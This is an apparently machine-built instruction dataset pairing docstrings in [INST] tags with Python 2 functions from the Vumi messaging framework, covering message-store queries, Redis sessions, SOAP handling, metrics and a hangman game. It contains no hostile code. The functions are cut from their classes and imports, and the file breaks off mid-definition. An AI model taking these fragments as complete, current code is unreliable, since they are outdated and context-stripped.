batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.inbound_messages, batch_id, 'batches_with_addresses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all outbound message keys with timestamps and addresses. +Results are ordered from newest to oldest.. [/INST] def batch_outbound_keys_with_addresses_reverse(self, batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.outbound_messages, batch_id, 'batches_with_addresses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all event keys with timestamps and statuses. +Results are ordered from newest to oldest.. [/INST] def batch_event_keys_with_statuses_reverse(self, batch_id, + max_results=None, + start=None, end=None): + if start is not None: + start = to_reverse_timestamp(start) + if end is not None: + end = to_reverse_timestamp(end) + start, end = end, start + return self._query_batch_index( + self.events, batch_id, 'batches_with_statuses_reverse', + max_results, start, end, key_with_rts_and_value_formatter) +[INST] Return all event keys with (and ordered by) timestamps and statuses.. [/INST] def message_event_keys_with_statuses(self, msg_id, max_results=None): + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + start_value, end_value = self._start_end_values(msg_id, None, None) + results = yield self.events.index_keys_page( + 'message_with_status', start_value, end_value, + return_terms=True, max_results=max_results) + returnValue(IndexPageWrapper( + key_with_ts_and_value_formatter, self, msg_id, results)) +[INST] Return inbound message stats for the specified time range. +Currently, message stats include total message count and unique address +count.. [/INST] def batch_inbound_stats(self, batch_id, max_results=None, + start=None, end=None): + total = 0 + unique_addresses = set() + start_value, end_value = self._start_end_values(batch_id, start, end) + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + raw_page = yield self.inbound_messages.index_keys_page( + 'batches_with_addresses', start_value, end_value, + return_terms=True, max_results=max_results) + page = IndexPageWrapper( + key_with_ts_and_value_formatter, self, batch_id, raw_page) + while page is not None: + results = list(page) + total += len(results) + unique_addresses.update(addr for key, timestamp, addr in results) + page = yield page.next_page() + returnValue({ + "total": total, + "unique_addresses": len(unique_addresses), + }) +[INST] Return outbound message stats for the specified time range. +Currently, message stats include total message count and unique address +count.. [/INST] def batch_outbound_stats(self, batch_id, max_results=None, + start=None, end=None): + total = 0 + unique_addresses = set() + start_value, end_value = self._start_end_values(batch_id, start, end) + if max_results is None: + max_results = self.DEFAULT_MAX_RESULTS + raw_page = yield self.outbound_messages.index_keys_page( + 'batches_with_addresses', start_value, end_value, + return_terms=True, max_results=max_results) + page = IndexPageWrapper( + key_with_ts_and_value_formatter, self, batch_id, raw_page) + while page is not None: + results = list(page) + total += len(results) + unique_addresses.update(addr for key, timestamp, addr in results) + page = yield page.next_page() + returnValue({ + "total": total, + "unique_addresses": len(unique_addresses), + }) +[INST] Wrap a raw index page object if it is not None.. [/INST] def _wrap_index_page(self, index_page): + if index_page is not None: + index_page = type(self)( + self._formatter, self._message_store, self._batch_id, + index_page) + return index_page +[INST] Fetch the next page of results.. [/INST] def next_page(self): + next_page = yield self._index_page.next_page() + returnValue(self._wrap_index_page(next_page)) +[INST] Indicate whether there are more results to follow.. [/INST] def has_next_page(self): + return self._index_page.has_next_page() +[INST] Post-migrate function to be used with `vumi_model_migrator` to add batches +to stored events that don't have any.. [/INST] def add_batches_to_event(stored_event): + if stored_event.batches.keys(): + returnValue(False) + outbound_messages = stored_event.manager.proxy(OutboundMessage) + msg_record = yield outbound_messages.load(stored_event.message.key) + if msg_record is not None: + for batch_id in msg_record.batches.keys(): + stored_event.batches.add_key(batch_id) + returnValue(True) +[INST] Publishes a status if it is not a repeat of the previously +published status.. [/INST] def add_status(self, **kw): + if self.status_detect.check_status(**kw): + return self.publish_status(**kw) + return succeed(None) +[INST] Can be overridden by subclasses to do something when the +response time is high enough for the transport to be considered +non-functioning.. [/INST] def on_down_response_time(self, message_id, time): + pass +[INST] Can be overridden by subclasses to do something when the +response time is high enough for the transport to be considered +running in a degraded state.. [/INST] def on_degraded_response_time(self, message_id, time): + pass +[INST] Can be overridden by subclasses to do something when the +response time is low enough for the transport to be considered +running normally.. [/INST] def on_good_response_time(self, message_id, time): + pass +[INST] helper to check whether a config key is defined. Only used for +verifying dict fields in the new-style configs. [/INST] def assert_field(cfg, key): + if key not in cfg: + raise ConfigError("Expected '%s' field in config" % key) +[INST] Compute the number of worker instances running on each host.. [/INST] def _compute_host_info(self, instances): + counts = {} + for ins in instances: + counts[ins.hostname] = 0 + for ins in instances: + counts[ins.hostname] = counts[ins.hostname] + 1 + return counts +[INST] Verify whether enough workers checked in. +Make sure to call snapshot() before running this method. [/INST] def audit(self, storage): + count = len(self._instances) + if (count >= self.min_procs) and (self.procs_count < self.min_procs): + yield storage.delete_worker_issue(self.worker_id) + if count < self.min_procs: + issue = WorkerIssue("min-procs-fail", time.time(), count) + yield storage.open_or_update_issue(self.worker_id, issue) + self.procs_count = count +[INST] This method must be run before any diagnostic audit and analyses +What it does is clear the instances_active set in preparation for +all the instances which will check-in in the next interval. + +All diagnostics are based on the _instances_active set, which +holds all the instances which checked-in the previous interval.. [/INST] def snapshot(self): + self._instances = self._instances_active + self._instances_active = set() +[INST] Parse configuration and populate in-memory state. [/INST] def parse_config(self, config): + systems = [] + workers = {} + for sys in config.values(): + assert_field(sys, 'workers') + assert_field(sys, 'system_id') + system_id = sys['system_id'] + system_workers = [] + for wkr_entry in sys['workers'].values(): + assert_field(wkr_entry, 'name') + assert_field(wkr_entry, 'min_procs') + worker_name = wkr_entry['name'] + min_procs = wkr_entry['min_procs'] + wkr = Worker(system_id, + worker_name, + min_procs) + workers[wkr.worker_id] = wkr + system_workers.append(wkr) + systems.append(System(system_id, system_id, system_workers)) + return systems, workers +[INST] Iterate over worker instance sets and check to see whether any have not +checked-in on time. + +We call snapshot() first, since the execution of tasks here is +interleaved with the processing of worker heartbeat messages.. [/INST] def _periodic_task(self): + for wkr in self._workers.values(): + wkr.snapshot() + for wkr in self._workers.values(): + yield wkr.audit(self._storage) + yield self._sync_to_storage() +[INST] Create a timer task to check for missing worker. [/INST] def _start_task(self): + self._task = LoopingCall(self._periodic_task) + self._task_done = self._task.start(self.deadline, now=False) + errfn = lambda failure: log.err(failure, + "Heartbeat verify: timer task died") + self._task_done.addErrback(errfn) +[INST] Find vumi message ids associated with SMPP sequence numbers.. [/INST] def lookup_message_ids(self, service, seq_nums): + lookup_func = service.message_stash.get_sequence_number_message_id + return gatherResults([lookup_func(seq_num) for seq_num in seq_nums]) +[INST] Clean-up of setup done in setup_application should happen here.. [/INST] def teardown_application(self): + pass +[INST] Respond to a new session. +Defaults to calling consume_user_message.. [/INST] def new_session(self, message): + return self.consume_user_message(message) +[INST] Close a session. +The .reply_to() method should not be called when the session is closed.. [/INST] def close_session(self, message): + pass +[INST] Check that endpoint is in the list of allowed endpoints.. [/INST] def check_endpoint(allowed_endpoints, endpoint): + if allowed_endpoints is None: + return + if endpoint is None: + endpoint = "default" + if endpoint not in allowed_endpoints: + raise InvalidEndpoint( + "Endpoint %r not defined in list of allowed endpoints %r" + % (endpoint, allowed_endpoints)) +[INST] Make an AST node with the relevant bits attached.. [/INST] def _mknode(cls, **kw): + node = cls() + node.lineno = 0 + node.col_offset = 0 + for k, v in kw.items(): + setattr(node, k, v) + return node +[INST] Create a function that has a nice signature and calls out to ``func``.. [/INST] def make_function(name, func, args, vararg=None, kwarg=None, defaults=()): + dflts = [("default_%s" % i, d) for i, d in enumerate(defaults)] + a_args = [_param(a) for a in args] + a_defaults = [_load(k) for k, v in dflts] + c_args = [_load(a) for a in args[:len(args) - len(defaults)]] + c_keywords = [_kw(a) for a in args[len(args) - len(defaults):]] + call = Call(func=_load('func'), args=c_args, keywords=c_keywords, + starargs=(vararg and _load(vararg)), + kwargs=(kwarg and _load(kwarg))) + func_def = FunctionDef( + name=name, args=arguments( + args=a_args, vararg=vararg, kwarg=kwarg, defaults=a_defaults), + body=[Return(value=call)], decorator_list=[]) + locs = {} + globs = dict(globals(), func=func, **dict(dflts)) + eval(compile(Module(body=[func_def]), '', 'exec'), globs, locs) + return locs[name] +[INST] Fetch the next page of results.. [/INST] def next_page(self): + if not self.has_next_page(): + return None + try: + result = self._index_page.next_page() + except RiakError as e: + raise VumiRiakError(e) + return type(self)(result) +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + return type(self)(func()) +[INST] Create an `SmsMessage` instance from an ElementTree element.. [/INST] def from_element(cls, root): + return cls( + message=gettext(root, 'message'), + sender_address=gettext( + root, 'senderAddress', parse=normalize_address), + service_activation_number=gettext( + root, 'smsServiceActivationNumber', parse=normalize_address), + timestamp=gettext(root, 'dateTime', parse=iso8601.parse_date)) +[INST] Create a `DeliveryInformation` instance from an ElementTree element.. [/INST] def from_element(cls, root): + try: + delivery_status = gettext( + root, 'deliveryStatus', parse=DeliveryStatus.lookupByName) + except ValueError, e: + raise ValueError( + 'No such delivery status enumeration value: %r' % (str(e),)) + else: + return cls( + address=gettext(root, 'address', parse=normalize_address), + delivery_status=delivery_status) +[INST] Process a SOAP request and convert any exceptions into SOAP faults.. [/INST] def render_POST(self, request): + def _writeResponse(response): + request.setHeader('Content-Type', 'text/xml; charset="utf-8"') + request.write(tostring(soap_envelope(response))) + request.finish() + def _handleSuccess(result): + request.setResponseCode(http.OK) + return result + def _handleError(f): + log.err(f, 'Failure processing SOAP request') + request.setResponseCode(http.INTERNAL_SERVER_ERROR) + faultcode = u'soapenv:Server' + if f.check(SoapFault): + return f.value.to_element() + return soap_fault(faultcode, f.getErrorMessage()) + try: + tree = parse_document(request.content) + body, header = unwrap_soap_envelope(tree) + except: + d = fail() + else: + d = maybeDeferred(self.process, request, body, header) + d.addCallback(_handleSuccess) + d.addErrback(_handleError) + d.addCallback(_writeResponse) + return NOT_DONE_YET +[INST] Process a received text message.. [/INST] def process_notifySmsReception(self, root, header, name): + linkid = None + if header is not None: + linkid = gettext(header, './/' + str(PARLAYX_COMMON_NS.linkid)) + correlator = gettext(root, NOTIFICATION_NS.correlator) + message = SmsMessage.from_element( + elemfind(root, NOTIFICATION_NS.message)) + d = maybeDeferred( + self.callback_message_received, correlator, linkid, message) + d.addCallback( + lambda ignored: NOTIFICATION_NS.notifySmsReceptionResponse()) + return d +[INST] Process a text message delivery receipt.. [/INST] def process_notifySmsDeliveryReceipt(self, root, header, name): + correlator = gettext(root, NOTIFICATION_NS.correlator) + delivery_info = DeliveryInformation.from_element( + elemfind(root, NOTIFICATION_NS.deliveryStatus)) + d = maybeDeferred(self.callback_message_delivered, + correlator, delivery_info.delivery_status.value) + d.addCallback( + lambda ignored: NOTIFICATION_NS.notifySmsDeliveryReceiptResponse()) + return d +[INST] Periodically clean out old buckets and calculate aggregates.. [/INST] def check_buckets(self): + current_ts_key = self._ts_key(self._time() - self.lag) - 1 + for ts_key in self.buckets.keys(): + if ts_key <= self._last_ts_key: + log.err(DiscardedMetricError("Throwing way old metric data: %r" + % self.buckets[ts_key])) + del self.buckets[ts_key] + elif ts_key <= current_ts_key: + aggregates = [] + ts = ts_key * self.bucket_size + items = self.buckets[ts_key].iteritems() + for metric_name, (agg_set, values) in items: + values = [v for t, v in sorted(values)] + for agg_name in agg_set: + agg_metric = "%s.%s" % (metric_name, agg_name) + agg_func = Aggregator.from_name(agg_name) + agg_value = agg_func(values) + aggregates.append((agg_metric, agg_value)) + for agg_metric, agg_value in aggregates: + self.publisher.publish_aggregate(agg_metric, ts, + agg_value) + del self.buckets[ts_key] + self._last_ts_key = current_ts_key +[INST] Builds a request URL with the appropriate params.. [/INST] def make_request(self, path, qparams): + args = { + 'messageid': TransportMessage.generate_id(), + 'time': self.today.strftime('%Y.%m.%d %H:%M:%S'), + 'sender': '0041791234567', + 'destination': '9292', + 'provider': 'provider', + 'keyword': '', + 'header': '', + 'text': '', + 'keyword': '', + } + args.update(qparams) + url = self.transport_url + path + return http_request_full(url, urlencode(args), { + 'Content-Type': ['application/x-www-form-urlencoded'], + }) +[INST] Invoke the canned response for the method name ``name`` and log the +invocation.. [/INST] def _invoke_response(self, name, args): + self.calls.append((name, args)) + return self.responses[name]() +[INST] Find or create a hangman game for this player. +Then process the user's message.. [/INST] def consume_user_message(self, msg): + content = msg['content'].encode('utf-8') if msg['content'] else None + log.msg("User message: %s" % content) + text = msg['content'] + if text is None: + reply = self.get_help() + else: + reply = self.process_message(text) + return self.reply_to(msg, reply) +[INST] Copy dynamic field values from old data to new data.. [/INST] def copy_dynamic_values(self, *dynamic_prefixes): + for prefix in dynamic_prefixes: + for key in self.old_data: + if key.startswith(prefix): + self.new_data[key] = self.old_data[key] +[INST] Add a new index value to new data.. [/INST] def add_index(self, index, value): + if index is None: + index = '' + else: + index = str(index) + if isinstance(value, unicode): + value = value.encode('utf-8') + self.new_index.setdefault(index, []).append(value) +[INST] Called when a field value changes.. [/INST] def _field_changed(self, changed_field_name): + already_notifying = bool(self._fields_changed) + if changed_field_name not in self._fields_changed: + self._fields_changed.append(changed_field_name) + if not already_notifying: + self._notify_fields_changed() +[INST] Save the object to Riak.. [/INST] def save(self): + return self.manager.store(self) +[INST] Delete the object from Riak.. [/INST] def delete(self): + return self.manager.delete(self) +[INST] Load an object from Riak.. [/INST] def load(cls, manager, key, result=None): + return manager.load(cls, key, result=result) +[INST] Load batches of objects for the given list of keys.. [/INST] def load_all_bunches(cls, manager, keys): + return manager.load_all_bunches(cls, keys) +[INST] Find object keys by index.. [/INST] def index_keys(cls, manager, field_name, value, end_value=None, + return_terms=None): + index_name, start_value, end_value = index_vals_for_field( + cls, field_name, value, end_value) + return manager.index_keys( + cls, index_name, start_value, end_value, return_terms=return_terms) +[INST] Find object keys by index, using pagination.. [/INST] def index_keys_page(cls, manager, field_name, value, end_value=None, + return_terms=None, max_results=None, + continuation=None): + index_name, start_value, end_value = index_vals_for_field( + cls, field_name, value, end_value) + return manager.index_keys_page( + cls, index_name, start_value, end_value, return_terms=return_terms, + max_results=max_results, continuation=continuation) +[INST] Finds objects in the index that match the regex patterns in query. [/INST] def index_match(cls, manager, query, field_name, value): + return manager.mr_from_field_match(cls, query, field_name, value) +[INST] Search for instances of this model matching keys/values.. [/INST] def search(cls, manager, **kw): + for k, value in kw.iteritems(): + value = unicode(value) + value = value.replace('\\', '\\\\') + value = value.replace("'", "\\'") + kw[k] = value + query = " AND ".join("%s:'%s'" % (k, v) for k, v in kw.iteritems()) + return cls.raw_search(manager, query) +[INST] Performs a raw riak search, does no inspection on the given query.. [/INST] def raw_search(cls, manager, query): + return manager.mr_from_search(cls, query) +[INST] Performs a real riak search, does no inspection on the given query.. [/INST] def real_search(cls, manager, query, rows=None, start=None): + return manager.real_search(cls, query, rows=rows, start=start) +[INST] Do a regex OR search across the keys found in a secondary index.. [/INST] def from_index_match(cls, mgr, model, query, index_name, start_value, + end_value=None): + mr = mgr.riak_map_reduce().index( + mgr.bucket_name(model), index_name, start_value, end_value).map( + """ + function(value, keyData, arg) { + /* + skip deleted values, might show up during a test + */ + var values = value.values.filter(function(val) { + return !val.metadata['X-Riak-Deleted']; + }); + if(values.length) { + var data = JSON.parse(values[0].data); + for (j in arg) { + var query = arg[j]; + var content = data[query.key]; + var regex = RegExp(query.pattern, query.flags) + if(content && regex.test(content)) { + return [value.key]; + } + } + } + return []; + } + """, { + 'arg': query, + }) + return cls(mgr, mr) +[INST] Construct a manager from a dictionary of options.. [/INST] def from_config(cls, config): + raise NotImplementedError("Sub-classes of Manager should implement" + " .from_config(...)") +[INST] Close the client underlying this manager instance, if necessary.. [/INST] def close_manager(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " .close_manager(...)") +[INST] Load a model instance for the key from Riak. +If the key doesn't exist, this method should return None +instead of an instance of cls.. [/INST] def load(self, cls, key, result=None): + raise NotImplementedError("Sub-classes of Manager should implement" + " .load(...)") +[INST] Migrate a loaded riak_object to the latest schema version. +NOTE: This should only be called by subclasses.. [/INST] def _migrate_riak_object(self, modelcls, key, riak_object): + was_migrated = False + while riak_object.get_data() is not None: + data_version = riak_object.get_data().get('$VERSION', None) + if data_version == modelcls.VERSION: + obj = modelcls(self, key, _riak_object=riak_object) + obj.was_migrated = was_migrated + return obj + migrator = modelcls.MIGRATOR(modelcls, self, data_version) + riak_object = migrator(riak_object).get_riak_object() + was_migrated = True + return None +[INST] Migrate a riak_object to the required schema version before storing. +NOTE: This should only be called by subclasses.. [/INST] def _reverse_migrate_riak_object(self, modelobj): + riak_object = modelobj._riak_object + modelcls = type(modelobj) + model_name = "%s.%s" % (modelcls.__module__, modelcls.__name__) + store_version = self.store_versions.get(model_name, modelcls.VERSION) + data_version = riak_object.get_data().get('$VERSION', None) + while data_version != store_version: + migrator = modelcls.MIGRATOR( + modelcls, self, data_version, reverse=True) + riak_object = migrator(riak_object).get_riak_object() + data_version = riak_object.get_data().get('$VERSION', None) + return riak_object +[INST] Load the model instances for a batch of keys from Riak. +If a key doesn't exist, no object will be returned for it.. [/INST] def _load_multiple(self, cls, keys): + raise NotImplementedError("Sub-classes of Manager should implement" + " ._load_multiple(...)") +[INST] Load the model instances for a batch of keys from Riak. +If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch_mapreduce(self, model, keys): + mr = self.mr_from_keys(model, keys) + mr._riak_mapreduce_obj.map(function=""" + function (v) { + values = v.values.filter(function(val) { + return !val.metadata['X-Riak-Deleted']; + }) + if (!values.length) { + return []; + } + return [[v.key, values[0]]] + } + """).filter_not_found() + return self.run_map_reduce( + mr._riak_mapreduce_obj, lambda mgr, obj: model.load(mgr, *obj)) +[INST] Load the model instances for a batch of keys from Riak. +If a key doesn't exist, no object will be returned for it.. [/INST] def _load_bunch(self, model, keys): + assert len(keys) <= self.load_bunch_size + if not keys: + return [] + if self.USE_MAPREDUCE_BUNCH_LOADING: + return self._load_bunch_mapreduce(model, keys) + else: + return self._load_multiple(model, keys) +[INST] Load batches of model instances for a list of keys from Riak.. [/INST] def load_all_bunches(self, model, keys): + while keys: + batch_keys = keys[:self.load_bunch_size] + keys = keys[self.load_bunch_size:] + yield self._load_bunch(model, batch_keys) +[INST] Run a map reduce instance and return the results mapped to +objects by the map_function.. [/INST] def run_map_reduce(self, mapreduce, mapper_func=None, reducer_func=None): + raise NotImplementedError("Sub-classes of Manager should implement" + " .run_map_reduce(...)") +[INST] Delete *ALL* keys in buckets whose names start buckets with +this manager's bucket prefix. + +Use only in tests.. [/INST] def purge_all(self): + raise NotImplementedError("Sub-classes of Manager should implement" + " .purge_all()") +[INST] Create a worker factory, connect to AMQP and return the factory. +Return value is the AmqpFactory instance containing the worker.. [/INST] def create_worker(self, worker_class, config, timeout=30, + bindAddress=None): + return self.create_worker_by_class( + load_class_by_string(worker_class), config, timeout=timeout, + bindAddress=bindAddress) +[INST] Return a list of active user_ids and associated sessions. Loops over +known active_sessions, some of which might have auto expired. +Implements lazy garbage collection, for each entry it checks if +the user's session still exists, if not it is removed from the set.. [/INST] def active_sessions(self): + skey = self.r_key('active_sessions') + sessions_to_expire = [] + for user_id in self.r_server.smembers(skey): + ukey = self.r_key('session', user_id) + if self.r_server.exists(ukey): + yield user_id, self.load_session(user_id) + else: + sessions_to_expire.append(user_id) + for user_ids in sessions_to_expire: + self.r_server.srem(skey, user_id) +[INST] Generate a keyname using this workers prefix. [/INST] def r_key(self, *args): + parts = [self.r_prefix] + parts.extend(args) + return ":".join(parts) +[INST] Schedule a session to timeout +Parameters + +user_id : str +The user's id. +timeout : int +The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout): + ukey = self.r_key('session', user_id) + self.r_server.expire(ukey, timeout) +[INST] Create a new session using the given user_id. [/INST] def create_session(self, user_id, **kwargs): + defaults = { + 'created_at': time.time() + } + defaults.update(kwargs) + self.save_session(user_id, defaults) + if self.max_session_length: + self.schedule_session_expiry(user_id, self.max_session_length) + return self.load_session(user_id) +[INST] Save a session +Parameters + +user_id : str +The user's id. +session : dict +The session info, nested dictionaries are not supported. Any +values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session): + ukey = self.r_key('session', user_id) + for s_key, s_value in session.items(): + self.r_server.hset(ukey, s_key, s_value) + skey = self.r_key('active_sessions') + self.r_server.sadd(skey, user_id) + return session +[INST] Construct a unique scheduled key.. [/INST] def scheduled_key(self): + timestamp = datetime.utcnow() + unique_id = uuid4().get_hex() + timestamp = timestamp.isoformat().split('.')[0] + return self.r_key(".".join(("scheduled", timestamp, unique_id))) +[INST] Return a list of active user_ids and associated sessions. +Queries redis for keys starting with the session key prefix. This is +O(n) over the total number of keys in redis, but this is still pretty +quick even for millions of keys. Try not to hit this too often, though.. [/INST] def active_sessions(self): + keys = yield self.redis.keys('session:*') + sessions = [] + for user_id in [key.split(':', 1)[1] for key in keys]: + sessions.append((user_id, (yield self.load_session(user_id)))) + returnValue(sessions) +[INST] Schedule a session to timeout +Parameters + +user_id : str +The user's id. +timeout : int +The number of seconds after which this session should expire. [/INST] def schedule_session_expiry(self, user_id, timeout): + ukey = "%s:%s" % ('session', user_id) + return self.redis.expire(ukey, timeout) +[INST] Create a new session using the given user_id. [/INST] def create_session(self, user_id, **kwargs): + yield self.clear_session(user_id) + defaults = { + 'created_at': time.time() + } + defaults.update(kwargs) + yield self.save_session(user_id, defaults) + if self.max_session_length: + yield self.schedule_session_expiry(user_id, + int(self.max_session_length)) + returnValue((yield self.load_session(user_id))) +[INST] Save a session +Parameters + +user_id : str +The user's id. +session : dict +The session info, nested dictionaries are not supported. Any +values that are dictionaries are converted to strings by Redis.. [/INST] def save_session(self, user_id, session): + ukey = "%s:%s" % ('session', user_id) + for s_key, s_value in session.items(): + yield self.redis.hset(ukey, s_key, s_value) + returnValue(session) +[INST] Application-specific config validation happens in here. +Subclasses may override this method to perform extra config +validation.. [/INST] def validate_config(self): + pass +[INST] Create an ElementTree element. +The element tag name will be this qualified name's +`QualifiedName.text` value.. [/INST] def element(self, *children, **attrib): + return Element(self.text, *children, **attrib) +[INST] Add children to an element.. [/INST] def _add_children(self, elem, children): + for child in children: + self._handle_child(elem, child) +[INST] Set XML attributes on an element.. [/INST] def _set_attributes(self, elem, attrib): + for k, v in attrib.items(): + elem.set(k, v) +[INST] Add text content to an element.. [/INST] def _add_text(self, elem, text): + if len(elem): + elem[-1] = (elem[-1].tail or '') + text + else: + elem.text = (elem.text or '') + text +[INST] Add a child element to a parent element. +Child elements can be any of the following.. [/INST] def _handle_child(self, parent, child): + if callable(child): + child = child() + t = self._typemap.get(type(child)) + if t is None: + if etree.iselement(child): + parent.append(child) + return + raise TypeError('Unknown child type: %r' % (child,)) + v = t(parent, child) + if v is not None: + self._handle_child(parent, v) +[INST] Split a fully qualified element name, in Clark's notation, into its URI and +local name components.. [/INST] def split_qualified(fqname): + if fqname and fqname[0] == '{': + return tuple(fqname[1:].split('}')) + return None, fqname +[INST] Convert an ElementTree element into a dictionary structure. +Text content is stored against a special key, ``#text``, unless the element +contains only text and no attributes. + +Attributes are converted into dictionaries of the attribute name, prefixed +with ``@``, keyed against the attribute value, which are keyed against the +root element's name. + +Child elements are recursively turned into dictionaries. Child elements +with the same name are coalesced into a ``list``.. [/INST] def element_to_dict(root): + d = {root.tag: {} if root.attrib else None} + children = root.getchildren() + if children: + dd = defaultdict(list) + for child_dict in map(element_to_dict, children): + for k, v in child_dict.iteritems(): + dd[k].append(v) + d = {root.tag: dict((k, v[0] if len(v) == 1 else v) + for k, v in dd.iteritems())} + if root.attrib: + d[root.tag].update( + ('@' + str(k), v) for k, v in root.attrib.iteritems()) + if root.text: + text = root.text.strip() + if children or root.attrib: + if text: + d[root.tag]['#text'] = text + else: + d[root.tag] = text + return d +[INST] Clean-up of setup done in setup_transport should happen here.. [/INST] def teardown_transport(self): + pass +[INST] Publish a :class:`TransportUserMessage` message. +Some default parameters are handled, so subclasses don't have +to provide a lot of boilerplate.. [/INST] def publish_message(self, **kw): + kw.setdefault('transport_name', self.transport_name) + kw.setdefault('transport_metadata', {}) + msg = TransportUserMessage(**kw) + return self.connectors[self.transport_name].publish_inbound(msg) +[INST] Publish a :class:`TransportEvent` message. +Some default parameters are handled, so subclasses don't have +to provide a lot of boilerplate.. [/INST] def publish_event(self, **kw): + kw.setdefault('transport_name', self.transport_name) + kw.setdefault('transport_metadata', {}) + event = TransportEvent(**kw) + return self.connectors[self.transport_name].publish_event(event) +[INST] Helper method for publishing a status message.. [/INST] def publish_status(self, **kw): + msg = TransportStatus(**kw) + if self._should_publish_status: + conn = self.connectors[self.status_connector_name] + return conn.publish_status(msg) + else: + self.log.debug( + 'Status publishing disabled for transport %r, ignoring ' + 'status %r' % (self.transport_name, msg)) + return succeed(msg) +[INST] This must be overridden to read outbound messages and do the right +thing with them.. [/INST] def handle_outbound_message(self, message): + raise NotImplementedError() +[INST] Emulate an inbound message from SMSSync on an Android phone.. [/INST] def smssync_inbound(self, content, from_addr='123', to_addr='555', + timestamp=None, message_id='1', secret=None): + msginfo = self.default_msginfo() + if timestamp is None: + timestamp = datetime.datetime.utcnow() + if hasattr(timestamp, 'strftime'): + timestamp = timestamp.strftime("%m-%d-%y %H:%M") + if secret is None: + secret = msginfo.smssync_secret + params = { + 'sent_to': to_addr, + 'from': from_addr, + 'message': content, + 'sent_timestamp': timestamp, + 'message_id': message_id, + 'secret': secret, + } + return self.smssync_call(params, method='POST') +[INST] Return the game state as a dict.. [/INST] def state(self): + return { + 'guesses': u"".join(sorted(self.guesses)), + 'word': self.word, + 'msg': self.msg, + } +[INST] Handle an user input string. +Parameters + +message : unicode +Message received from user.. [/INST] def event(self, message): + message = message.lower() + if not message: + self.msg = u"Some input required please." + elif len(message) > 1: + self.msg = u"Single characters only please." + elif message == '0': + self.exit_code = self.DONE + self.msg = u"Game ended." + elif self.won(): + self.exit_code = self.DONE_WANTS_NEW + elif message not in string.lowercase: + self.msg = u"Letters of the alphabet only please." + elif message in self.guesses: + self.msg = u"You've already guessed '%s'." % (message,) + else: + assert len(message) == 1 + self.guesses.add(message) + log.msg("Message: %r, word: %r" % (message, self.word)) + if message in self.word: + self.msg = u"Word contains at least one '%s'! :D" % (message,) + else: + self.msg = u"Word contains no '%s'. :(" % (message,) + if self.won(): + self.msg = self.victory_message() +[INST] Fetch a game for the given user ID.. [/INST] def load_game(self, msisdn): + game_key = self.game_key(msisdn) + state = yield self.session_manager.load_session(game_key) + if state: + game = HangmanGame.from_state(state) + else: + game = None + returnValue(game) +[INST] Create a new game for the given user ID.. [/INST] def new_game(self, msisdn, random_word_url): + word = yield self.random_word(random_word_url) + word = word.strip().lower() + game = HangmanGame(word) + game_key = self.game_key(msisdn) + yield self.session_manager.create_session(game_key, **game.state()) + returnValue(game) +[INST] Save the game state for the given game.. [/INST] def save_game(self, msisdn, game): + game_key = self.game_key(msisdn) + state = game.state() + return self.session_manager.save_session(game_key, state) +[INST] Find or create a hangman game for this player. +Then process the user's message.. [/INST] def consume_user_message(self, msg): + log.msg("User message: %s" % msg['content']) + user_id = msg.user() + config = yield self.get_config(msg) + game = yield self.load_game(user_id) + if game is None: + game = yield self.new_game(user_id, config.random_word_url) + if msg['content'] is None: + self.reply_to(msg, game.draw_board(), True) + return + message = msg['content'].strip() + game.event(message) + continue_session = True + if game.exit_code == game.DONE: + yield self.delete_game(user_id) + continue_session = False + elif game.exit_code == game.DONE_WANTS_NEW: + game = yield self.new_game(user_id, config.random_word_url) + else: + yield self.save_game(user_id, game) + self.reply_to(msg, game.draw_board(), continue_session) +[INST] Start the metric polling and publishing task.. [/INST] def start_polling(self): + self._task = LoopingCall(self.publish_metrics) + done = self._task.start(self._publish_interval, now=False) + done.addErrback(lambda failure: log.err(failure, + "MetricManager polling task died")) +[INST] Stop the metric polling and publishing task.. [/INST] def stop_polling(self): + if self._task: + if self._task.running: + self._task.stop() + self._task = None +[INST] Publish a single value for the given metric.. [/INST] def oneshot(self, metric, value): + self._oneshot_msgs.append( + (metric, [(int(time.time()), value)])) +[INST] Register a new metric object to be managed by this metric set. +A metric can be registered with only one metric set.. [/INST] def register(self, metric): + metric.manage(self) + self._metrics.append(metric) + if metric.name in self._metrics_lookup: + raise MetricRegistrationError("Duplicate metric name %s" + % metric.name) + self._metrics_lookup[metric.name] = metric + return metric +[INST] Start publishing metrics in a loop.. [/INST] def start(self, channel): + if self._publisher is not None: + raise RuntimeError("Publisher already present.") + self._publisher = MetricPublisher() + self._publisher.start(channel) + self.start_polling() +[INST] Called by :class:`MetricManager` when this metric is registered.. [/INST] def manage(self, manager): + if self._manager is not None: + raise MetricRegistrationError( + "Metric %s already registered with MetricManager with" + " prefix %s." % (self.name, self._manager.prefix)) + self._manager = manager +[INST] Raise an exception if closed, otherwise return underlying client.. [/INST] def _client(self): + if self._closed: + raise VumiRiakError("Can't use closed Riak client.") + return self._raw_client +[INST] Purge all objects and buckets properties belonging to buckets with the +given prefix. + +This operation should *ONLY* be used in tests.. [/INST] def _purge_all(self, bucket_prefix): + buckets = self._raw_client.get_buckets() + for bucket in buckets: + if bucket.name.startswith(bucket_prefix): + for key in bucket.get_keys(): + obj = bucket.get(key) + obj.delete() + bucket.clear_properties() + if self._closed: + self.close() +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + raise NotImplementedError("Subclasses must implement this.") +[INST] Migrate keys from `keys_list` until there are none left. +This method is expected to be called multiple times concurrently with +all instances sharing the same `keys_list`.. [/INST] def migrate_keys(self, _result, keys_list, dry_run): + while keys_list: + key = keys_list.pop(0) + yield self.migrate_key(key, dry_run) +[INST] Perform an index query to get all keys and migrate them. +If `continuation` is provided, it will be used as the starting point +for the query.. [/INST] def migrate_all_keys(self, continuation=None): + 